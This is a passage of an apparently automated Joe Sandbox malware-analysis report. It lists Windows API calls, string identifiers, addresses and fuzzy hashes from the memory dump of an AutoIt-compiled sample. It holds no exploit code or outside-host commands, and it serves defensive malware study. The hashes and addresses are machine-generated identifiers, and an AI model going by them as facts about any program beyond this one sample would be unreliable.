• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00964A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00964ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00964AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00964AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00964B09
• IsWindowVisible.USER32(?), ref: 00964B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00964B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00964B58
• GetWindowRect.USER32(?,?), ref: 00964B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00964B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00964BB0
• CopyRect.USER32(?,?), ref: 00964BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00964C32
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 36f64b5081292ac875da398ee44d31da641ea4cb7c671e0ec8eddf77047969ca
• Instruction ID: db8c61340c930d268baf38d23ee3636990088be92375c6c8b93e5922e2912530
• Opcode Fuzzy Hash: 36f64b5081292ac875da398ee44d31da641ea4cb7c671e0ec8eddf77047969ca
• Instruction Fuzzy Hash: 64B1BE71608350AFDB04DFA9D844B6ABBE4FF89314F00892CF5999B2A1D7B1EC05CB56
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 009444AC
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009444D2
• _wcscpy.LIBCMT ref: 00944500
• _wcscmp.LIBCMT ref: 0094450B
• _wcscat.LIBCMT ref: 00944521
• _wcsstr.LIBCMT ref: 0094452C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00944548
• _wcscat.LIBCMT ref: 00944591
• _wcscat.LIBCMT ref: 00944598
• _wcsncpy.LIBCMT ref: 009445C3
Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                • Opcode ID: 84162fd8dc6df9906fbabc3bf971a0c64768fb7da7b41aaa60a88bc01a243b6e
                                                                                                                • Instruction ID: 1ffa6960a1e7395188653bdbc3c0a7e369070c9fd7cf4c870fde9db9bc17d5d6
                                                                                                                • Opcode Fuzzy Hash: 84162fd8dc6df9906fbabc3bf971a0c64768fb7da7b41aaa60a88bc01a243b6e
                                                                                                                • Instruction Fuzzy Hash: 3941D472A002047FDB10AB74DC47FBF77ACEFC2710F14456AF905E61C2EA75AA0196A5
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E28BC
• GetSystemMetrics.USER32(00000007), ref: 008E28C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E28EF
• GetSystemMetrics.USER32(00000008), ref: 008E28F7
• GetSystemMetrics.USER32(00000004), ref: 008E291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008E2939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008E2949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008E297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008E2990
• GetClientRect.USER32(00000000,000000FF), ref: 008E29AE
• GetStockObject.GDI32(00000011), ref: 008E29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 008E29D5
  • Part of subcall function 008E2344: GetCursorPos.USER32(?), ref: 008E2357
  • Part of subcall function 008E2344: ScreenToClient.USER32(009A57B0,?), ref: 008E2374
  • Part of subcall function 008E2344: GetAsyncKeyState.USER32(00000001), ref: 008E2399
  • Part of subcall function 008E2344: GetAsyncKeyState.USER32(00000002), ref: 008E23A7
• SetTimer.USER32(00000000,00000000,00000028,008E1256), ref: 008E29FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 2c387f54bfd3ca00fba78a00503deacc76716c94ee88e0cbeb4cb57ceea8e097
• Instruction ID: 48d389328294f633c91fba138c134adf5c58c27d9aa435e2d9b66dd71edcca14
• Opcode Fuzzy Hash: 2c387f54bfd3ca00fba78a00503deacc76716c94ee88e0cbeb4cb57ceea8e097
• Instruction Fuzzy Hash: 09B1AC71A5424AEFDB14DFA8DC55BAE7BB8FB09310F104129FA16E72A0CB74A840DB50
APIs
• CharUpperBuffW.USER32(?,?), ref: 00963E6F
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00963F2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 05bfb36e6793ece0b606232a13622c1fa17249b2e1545e8e774129be1e977968
• Instruction ID: 1c2a1e10b5b1b40b299eff219a3cfc358d28833f7ad7a522805b178fc3a9ba02
• Opcode Fuzzy Hash: 05bfb36e6793ece0b606232a13622c1fa17249b2e1545e8e774129be1e977968
• Instruction Fuzzy Hash: 9FA17A302143519FCB14EF69C852B6AB7A5FF96314F10882CF8A69B2D2DB71ED05CB52
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0093A47A
• __swprintf.LIBCMT ref: 0093A51B
• _wcscmp.LIBCMT ref: 0093A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0093A583
• _wcscmp.LIBCMT ref: 0093A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 0093A5F6
• GetDlgCtrlID.USER32(?), ref: 0093A648
• GetWindowRect.USER32(?,?), ref: 0093A67E
• GetParent.USER32(?), ref: 0093A69C
• ScreenToClient.USER32(00000000), ref: 0093A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 0093A71D
• _wcscmp.LIBCMT ref: 0093A731
• GetWindowTextW.USER32(?,?,00000400), ref: 0093A757
• _wcscmp.LIBCMT ref: 0093A76B
  • Part of subcall function 0090362C: _iswctype.LIBCMT ref: 00903634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: a93e8ada849fc477a2e691761c04ac62a4b8bc4e356b9ea91825c19596caeee3
• Instruction ID: 1e9870ea59fd5de4f1f0145b886b3dd4e6988ecbc914586caf78c55e7675aef5
• Opcode Fuzzy Hash: a93e8ada849fc477a2e691761c04ac62a4b8bc4e356b9ea91825c19596caeee3
• Instruction Fuzzy Hash: 35A1AD71604606AFDB14DF64C888BAAB7ECFF44354F008629F9DAD21A0DB34E955CF92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0093AF18
• _wcscmp.LIBCMT ref: 0093AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0093AF51
• CharUpperBuffW.USER32(?,00000000), ref: 0093AF6E
• _wcscmp.LIBCMT ref: 0093AF8C
• _wcsstr.LIBCMT ref: 0093AF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 0093AFD5
• _wcscmp.LIBCMT ref: 0093AFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0093B00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 0093B055
• _wcscmp.LIBCMT ref: 0093B065
• GetClassNameW.USER32(00000010,?,00000400), ref: 0093B08D
• GetWindowRect.USER32(00000004,?), ref: 0093B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 3b1a64daab446bb79e42891c15719ba32d2d30f7ba77c5854240cc5de7491dad
• Instruction ID: 5ea45b30e5d197faf3d02d0386898d0cc8f1011e413c911c5eee0dca4e728e41
• Opcode Fuzzy Hash: 3b1a64daab446bb79e42891c15719ba32d2d30f7ba77c5854240cc5de7491dad
• Instruction Fuzzy Hash: AD818F711082099FDB05DF54C895BAA7BECFF84318F04856AFE858A0A6DB34DD45CFA2
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: c841bf54d7d16e6d5dc5da88926650105ffc7ae1e375c6684f98811135ae6922
• Instruction ID: 4e9d1fc20583d4d312682e8da35970698ae62f9589c840ec734872168d04d05f
• Opcode Fuzzy Hash: c841bf54d7d16e6d5dc5da88926650105ffc7ae1e375c6684f98811135ae6922
• Instruction Fuzzy Hash: 1A318531948205ABDE14FBA9DD03EEEB768AF61715F600419F492B10E1EF516F04CA57
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00955013
• LoadCursorW.USER32(00000000,00007F00), ref: 0095501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00955029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00955034
• LoadCursorW.USER32(00000000,00007F01), ref: 0095503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0095504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00955055
• LoadCursorW.USER32(00000000,00007F80), ref: 00955060
• LoadCursorW.USER32(00000000,00007F86), ref: 0095506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00955076
• LoadCursorW.USER32(00000000,00007F85), ref: 00955081
• LoadCursorW.USER32(00000000,00007F82), ref: 0095508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00955097
• LoadCursorW.USER32(00000000,00007F04), ref: 009550A2
• LoadCursorW.USER32(00000000,00007F02), ref: 009550AD
• LoadCursorW.USER32(00000000,00007F89), ref: 009550B8
• GetCursorInfo.USER32(?), ref: 009550C8
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 5191808d5928a03886b3ee09b53f90331e3099c27e7a83a7e42139304646ee48
• Instruction ID: 5835637c9fdf5b743482149cdde89a40220deb5eea7429c2167c18e48c4dd3aa
• Opcode Fuzzy Hash: 5191808d5928a03886b3ee09b53f90331e3099c27e7a83a7e42139304646ee48
• Instruction Fuzzy Hash: ED3112B1D083196ADF109FB68C8996EBFE8FF04750F50453AE50CE7281DA78A5048F91
APIs
• _memset.LIBCMT ref: 0096A259
• DestroyWindow.USER32(?,?), ref: 0096A2D3
  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0096A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0096A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096A382
• DestroyWindow.USER32(00000000), ref: 0096A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 0096A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096A3F4
• GetDesktopWindow.USER32 ref: 0096A40D
• GetWindowRect.USER32(00000000), ref: 0096A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0096A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0096A444
  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: e877c7b07d7c8a4cd6fef72bd89ad01647c4709e531d55d42f805fb672be9f42
• Instruction ID: 344740433c706d31982579d94123538652f8ebc37747bc7e518077c91eeb310a
• Opcode Fuzzy Hash: e877c7b07d7c8a4cd6fef72bd89ad01647c4709e531d55d42f805fb672be9f42
• Instruction Fuzzy Hash: A3718970254205AFD721CF28CC49F6A7BE9FB89704F04492CF985972B1DBB5A902DF52
APIs
  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
• DragQueryPoint.SHELL32(?,?), ref: 0096C627
  • Part of subcall function 0096AB37: ClientToScreen.USER32(?,?), ref: 0096AB60
  • Part of subcall function 0096AB37: GetWindowRect.USER32(?,?), ref: 0096ABD6
  • Part of subcall function 0096AB37: PtInRect.USER32(?,?,0096C014), ref: 0096ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0096C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0096C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0096C6BE
• _wcscat.LIBCMT ref: 0096C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0096C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0096C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0096C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0096C757
• DragFinish.SHELL32(?), ref: 0096C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0096C851
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 38dfd869a5ae847933b62b46a3975c9b12effb42ccdd1495ed92983f27c71857
• Instruction ID: 116845a8c88d62e76139e74272672e8a437c925b9402705f8472d06c4d2973d7
• Opcode Fuzzy Hash: 38dfd869a5ae847933b62b46a3975c9b12effb42ccdd1495ed92983f27c71857
• Instruction Fuzzy Hash: D3614771508341AFC701EF69DC85DABBBE8FF8A754F00092EF5A5921B1DB709A09CB52
APIs
• CharUpperBuffW.USER32(?,?), ref: 00964424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0096446F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: de160b1a3f98eb37cb7f1c98d69f08f62ea62936a76612e08810138087ca5fa8
• Instruction ID: 53a1b81f1e227913e8bd4502efed9a98e4f6a80e948f4cd5cc97c9289fb928dc
• Opcode Fuzzy Hash: de160b1a3f98eb37cb7f1c98d69f08f62ea62936a76612e08810138087ca5fa8
• Instruction Fuzzy Hash: 169158702043519FCB14EF68C451B6EB7E5AF96354F04886CF8969B3A2CB75ED09CB82
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0096B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009691C2), ref: 0096B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0096B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096B9C3
• FreeLibrary.KERNEL32(?), ref: 0096B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096B9DF
• DestroyIcon.USER32(?,?,?,?,?,009691C2), ref: 0096B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0096BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0096BA17
  • Part of subcall function 00902EFD: __wcsicmp_l.LIBCMT ref: 00902F86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: b95d9e748eaa9424c411a72ab21e18d74628111217104ee148f325ae14de747b
• Instruction ID: 0156c1c732e0d8518bfa2b173f58650bde19b8a5ffc64969f34e2a326c341000
• Opcode Fuzzy Hash: b95d9e748eaa9424c411a72ab21e18d74628111217104ee148f325ae14de747b
• Instruction Fuzzy Hash: 3261CD71940219BAEB14DF68DC45FBE7BACFB08714F10451AFA15D61D0EBB49980DBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 0094DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0094DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0094DCF8
• __wsplitpath.LIBCMT ref: 0094DD56
• _wcscat.LIBCMT ref: 0094DD6E
• _wcscat.LIBCMT ref: 0094DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDFC
• _wcscpy.LIBCMT ref: 0094DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0094DE47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: f938b5e24f69c23c1d535cbef06083fe335c78174764a9ce19776ce6143c7996
• Instruction ID: f042f98d6283dda5e0c8e8028751efd12a5cf0428db0a8b6e76a43faf8a1fbf9
• Opcode Fuzzy Hash: f938b5e24f69c23c1d535cbef06083fe335c78174764a9ce19776ce6143c7996
• Instruction Fuzzy Hash: 88618B765042459FCB10EF24C884EAEB3E8FF89314F04492EF989C7251EB71E945CB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00949C7F
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00949CA0
• __swprintf.LIBCMT ref: 00949CF9
• __swprintf.LIBCMT ref: 00949D12
• _wprintf.LIBCMT ref: 00949DB9
• _wprintf.LIBCMT ref: 00949DD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 33a5f51002940727207508d30b05c284cd2eaef17e4d052a7f86d228fe5d5ecb
• Instruction ID: 2400ba605cea6bfc9b880c7a783cb2742d4454b4ce84727f44b75d2141ca3fec
• Opcode Fuzzy Hash: 33a5f51002940727207508d30b05c284cd2eaef17e4d052a7f86d228fe5d5ecb
• Instruction Fuzzy Hash: F4518E31D04549AACF14EBE9DD46EEEB778FF16304F600065F519B20A2EB312E58DB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0094A3CB
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0094A418
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A460
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A497
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A4C5
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                • Opcode ID: b10750d798dc233b96adb3145f070c6cc58282cb3532fcfe9a273a9ecbe8df8c
